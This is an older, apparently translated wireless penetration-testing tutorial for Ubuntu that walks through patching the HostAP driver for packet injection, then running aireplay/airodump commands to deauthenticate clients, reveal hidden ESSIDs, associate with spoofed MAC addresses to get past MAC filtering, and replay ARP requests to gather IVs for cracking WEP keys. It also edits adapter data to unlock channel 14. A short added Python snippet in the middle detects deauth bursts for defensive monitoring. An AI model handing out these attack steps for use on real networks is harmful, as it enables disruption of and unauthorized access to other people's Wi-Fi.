Operating system used in the tutorial: Ubuntu 6.06 LTS Dapper Drake (it also works with Ubuntu 6.10, 7.04, 7.10, 8.04, 9.04 and 10.04; see the link on patching hostap in newer Ubuntu releases). Hardware you meet in the tutorial: WiFi adapters Z-Com XI-626 (Prism 2.5) and CM9 (Atheros). Applications: Aircrack pack, Kismet, tcpdump. Driver: HostAP with the packet injection patch. Questions and discussion have been moved to the Forum Ubuntu Security thread.
The Ubuntu repositories contain everything needed, including the hostap source, but we use the latest hostap version 0.4.9 together with the 0.4.7 packet injection patch.
Ubuntu installed from DVD picks the kernel by processor type (an AMD machine gets the k7 kernel, an Intel machine gets the i386 kernel).
The packet injection patch does not work correctly, or at all, under the k7 kernel.
So we need to install the i386 kernel image and its kernel headers and boot into it.
The Z-Com XI-626 adapter (as is usual for Prism cards in Linux) is driven by the orinoco module, which conflicts with HostAP. Unload it with modprobe as follows.
Remove that module as root:
modprobe -r orinoco_pci
and blacklist orinoco_pci in /etc/modprobe.d/blacklist.
After the reboot download the driver and apply the patch:
tar -xvzf hostap-driver-0.4.9.tar.gz
patch -Np1 -i hostap-driver-0.4.7.patch
Next, in the path /home/user/hostap-driver-0.4.9/driver/modules/ search for the files that contain the following guard. In each of those files find these five rows (the #if ... #error ... #endif guard) and remove them:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,14)
#error "Host AP driver was added into Linux 2.6.14."
#error "The version used in the kernel tree should be used instead of this"
#error "external release which is only maintained for old kernel versions."
#endif
Start the compilation: run make.
Afterwards, don't use "make install". First back up the original contents, then clean up the hostap folder and copy all *.ko files from hostap-driver-0.4.9/driver/modules/ into /lib/modules/2.6…..-386/kernel/drivers/net/wireless/hostap/
Next, find hostap_en.conf in hostap-driver-0.4.9/driver/etc/ and copy it into /etc/pcmcia/
Reboot. After the reboot run these commands:
ifconfig wlan0 down
ifconfig wlan0 up
Check with the command dmesg | grep hostap
A Z-Com with firmware newer than 1.7.4 is registered in the system as ethX. This firmware version is recommended; otherwise try to flash your adapter. Check your firmware version with
hostap_diag -p wlan0
You'll see something like this: Host AP driver diagnostics information for 'wlan0'
id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)
id=0x001f v1.7.4 (station firmware)
Channel 14
To get channel 14 working on the Z-Com adapter we need to edit the PDA (Production Data Area). Don't change the localization; just change 1fff to 3fff on line 0x0104.
Packet injection is nothing more than a time saver. Cracking WEP is possible without packet injection, but it can take tens of hours or a few days. The Aircrack pack contains these parts: aircrack, airodump, airmon, aireplay, airdecap.
The Aircrack-ng pack contains these parts: aircrack-ng, airodump-ng, airmon-ng, aireplay-ng, packetforge-ng, airtun-ng, airserv-ng. We use packet injection in Aireplay. Before we start working we should check that packet injection works at all.
Option 1: Switch the adapter to monitor mode. The iwconfig command comes from wireless tools, airmon from the aircrack pack.
iwconfig wlan0 mode monitor or airmon start wlan0 (for aircrack-ng the command is airmon-ng start wlan0)
Now run Ethereal or Wireshark showing live traffic on the wlan0 adapter. To show only deauth packets, use a display filter.
In the next step run this command in a shell:
aireplay -0 5 -a 01:02:03:04:05:06 wlan0
(the command for the newer aircrack-ng is aireplay-ng -0 5 -a 01:02:03:04:05:06 wlan0)
In the Ethereal window you should see five deauth packets with MAC address 01:02:03:04:05:06.
Option II: Test against an AP with a hidden ESSID. If a client deauth doesn't work on an encrypted network even though you know the client's MAC, you're out of luck.
Monitor mode, detection
Hundreds of pages have been written about WEP (Wired Equivalent Privacy) weaknesses, and new attacks like Chopchop keep coming out, so if you want to know more, go and search.
Switch the adapter to monitor mode:
airmon start wlan0
(the command for aircrack-ng is airmon-ng start wlan0)
Run Airodump, which scans the available networks until stopped (Ctrl+C). "3" is the channel number, "out" is the log file, and "1" after the channel number means that only WEP packets will be logged. (The log file name and channel number are optional.)
airodump wlan0 out 3 1
The command for aircrack-ng is airodump-ng --ivs -w out --ch 3 wlan0
For Aircrack-ng with a particular BSSID, in case there are many APs around:
airodump-ng --bssid 00:60:Bx:xx:xx:xx --ivs -w out --ch 3 wlan0
Aircrack comment: without the file format flag "1" (meaning "ivs") it is possible to store into pcap. The first thing to notice is the signal strength. Too large or too small a distance is a problem: with saturation (the AP too close) you may see no signal even though the AP is right on your desk. The displayed PWR values are authentic. A value lower than 163 means no hope.
The optimal PWR value is between 167 and 195. Finding the best direction by moving the antenna while watching PWR costs very little time. Finding the polarization is a matter of rotating the antenna by 90°. To improve throughput use the power regulation (the default on Z-Com is 198):
iwpriv wlan0 writemif 62 130
These settings lead to less packet loss:
iwconfig wlan0 rate 1M
iwconfig wlan0 sens 3 (allowed values are 1, 2 and 3)
Deauth, Packet injection, Hidden essid
The detected AP has a good signal and connected clients but does not broadcast its ESSID.
Use Aireplay -0. The number 5 is the count of deauth packets we send; "-0" is the first of the five modes in Aireplay.
Deauth to broadcast:
aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0
Deauth a client with a given MAC:
aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Deauth to broadcast with a source MAC:
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx wlan0
Deauth a client with a source MAC:
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
The command for Aireplay-ng:
aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
The deauth "disconnects" the client from the AP, and Airodump in the first shell records that client's reconnection, which contains the ESSID. Now we have the name of the AP.
To start communicating with the AP it is first necessary to knock on the door :-), that is, to associate. If MAC filtering is set up on the AP, you need to know at least one valid MAC address; that is exactly what the list of connected clients is for. When Airodump does not detect any clients it means: bad signal, bad timing :-), an ad-hoc network, or a data AP. Nobody usually connects to such a data AP; it serves only as a data link (used for example by UPC) or as a repeater (bridge).
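The deauth burst used in the Ethereal check above and in this section is exactly what a wireless monitoring sensor should flag. The following Python snippet is an added example, not code from the original tutorial: it parses raw 802.11 management frames, picks out deauthentication frames and reports transmitter/destination pairs that reach a threshold. The frame bytes are constructed samples, and the MAC addresses, reason code and threshold are assumed values.

```python
"""Added example: flag deauthentication bursts in raw 802.11 frames.
Not part of the original tutorial; the frames below are constructed samples."""
from collections import Counter

DEAUTH_SUBTYPE = 12  # management frame (type 0), subtype 12 = deauthentication


def _mac(frame, off):
    return ":".join(f"{b:02x}" for b in frame[off:off + 6])


def parse_mgmt_frame(frame):
    """Return (subtype, addr1, addr2, addr3) for a management frame,
    or None for non-management or truncated frames (24-byte MAC header)."""
    if len(frame) < 24:
        return None
    fc = frame[0]               # frame control byte: version, type, subtype
    if (fc >> 2) & 0x3 != 0:    # type 0 = management
        return None
    return (fc >> 4) & 0xF, _mac(frame, 4), _mac(frame, 10), _mac(frame, 16)


def deauth_bursts(frames, threshold=3):
    """Count deauth frames per (transmitter, destination) pair and return the
    pairs that reach the threshold; a broadcast destination is ff:ff:ff:ff:ff:ff."""
    counts = Counter()
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed and parsed[0] == DEAUTH_SUBTYPE:
            _, dst, src, _bssid = parsed
            counts[(src, dst)] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


def _sample(subtype, a1, a2, a3, body=b""):
    """Build one constructed management frame: FC, duration, three addresses, seq."""
    return bytes([subtype << 4, 0]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + body


AP = bytes.fromhex("006000000001")     # assumed AP MAC
STA = bytes.fromhex("006000000002")    # assumed client MAC
BCAST = b"\xff" * 6
REASON_7 = b"\x07\x00"                 # assumed reason code 7, little-endian
SAMPLE_FRAMES = (
    [_sample(12, BCAST, AP, AP, REASON_7)] * 5   # five broadcast deauths, as in the test above
    + [_sample(12, STA, AP, AP, REASON_7)]       # one targeted deauth: below threshold
    + [_sample(8, BCAST, AP, AP)]                # a beacon: not a deauth
    + [b"\x08\x01" + b"\x00" * 22]               # a data frame: not management
)

if __name__ == "__main__":
    for (src, dst), n in deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst: {n} frames from {src} to {dst}")
```

On a real sensor the frames would come from a monitor-mode capture of the kind airodump writes, and the threshold would be evaluated per time window rather than over the whole capture.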
aireplay -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0
aireplay-ng -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx ath0
Given sufficient signal, knowledge of the ESSID [AP name] and an allowed MAC address (in the case of MAC filtering), the association works 99% of the time.
ARP, traffic generation
After associating, start packet injection with Aireplay -3 [ARP-request replay]. Replaying multiplies the traffic, the number of WEP packets, and thus the number of initialization vectors :-)
aireplay -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0
aireplay-ng -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0
-x 600 is the number of packets per second. The number of ARP requests (-u) stops at 1024.
Watch the progress in the first panel.
The time in which Airodump gathers enough packets [80 to 300 thousand for a 64-bit key, 300 000 to 1 000 000 packets for a 128-bit key] depends on the speed of the link, i.e. the signal quality mentioned above. Gathering the packets takes from 10 minutes to one hour [+/-]. Ideally, associate with the same MAC address as a client that generates traffic itself [for example by downloading on p2p].
In that case, after packet injection starts, 300 000 IVs arrive within a few minutes. Aireplay, Airodump and Aircrack can all be stopped and restarted without affecting the result.
The second part of Wireless Penetration Testing continues in the text KoreK, Kismet and Gateway.